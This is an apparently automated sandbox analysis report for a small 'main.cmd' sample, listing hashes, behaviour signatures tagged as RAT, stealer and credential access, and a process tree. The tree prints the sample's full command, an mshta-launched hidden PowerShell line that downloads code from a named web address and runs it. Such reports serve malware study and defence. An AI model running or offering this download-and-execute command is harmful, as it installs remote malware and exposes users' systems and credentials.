Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-01-2025 06:11
Static task
static1
Behavioral task
behavioral1
Sample
main.cmd
Resource
win7-20240903-en
6 signatures
150 seconds
Behavioral task
behavioral2
Sample
main.cmd
Resource
win10v2004-20241007-en
xwormcollectioncredential_accessdefense_evasiondiscoveryexecutionpersistenceprivilege_escalationpyinstallerratspywarestealertrojanupxvmprotect
36 signatures
150 seconds
General
-
Target
main.cmd
-
Size
140B
-
MD5
6048bdda1dfd48e6a362ab0215f5e568
-
SHA1
e49d8e37a5eff5fd81584bca4d2184a2a9716b67
-
SHA256
280dcd871598f7ac18dba9d481761b75a46ea1603ffcc221382a512399daa416
-
SHA512
d56ea7dc7c6b1931cd15248e034906b4187c07ea5114699b0be98e85c7f008a40a1754aa17fb0cfd1e939c04357ee37ea8d6f8f4ecd6d2b3996ef7fb3a93bcff
Score
3/10
Malware Config
Signatures
-
pid Process 2760 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2760 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2760 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2056 wrote to memory of 2676 2056 cmd.exe 32 PID 2056 wrote to memory of 2676 2056 cmd.exe 32 PID 2056 wrote to memory of 2676 2056 cmd.exe 32 PID 2676 wrote to memory of 2760 2676 mshta.exe 33 PID 2676 wrote to memory of 2760 2676 mshta.exe 33 PID 2676 wrote to memory of 2760 2676 mshta.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\main.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\system32\mshta.exemshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://codeforfun.vercel.app/sigma') | iex""",0)(window.close)2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "iwr('https://codeforfun.vercel.app/sigma') | iex"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-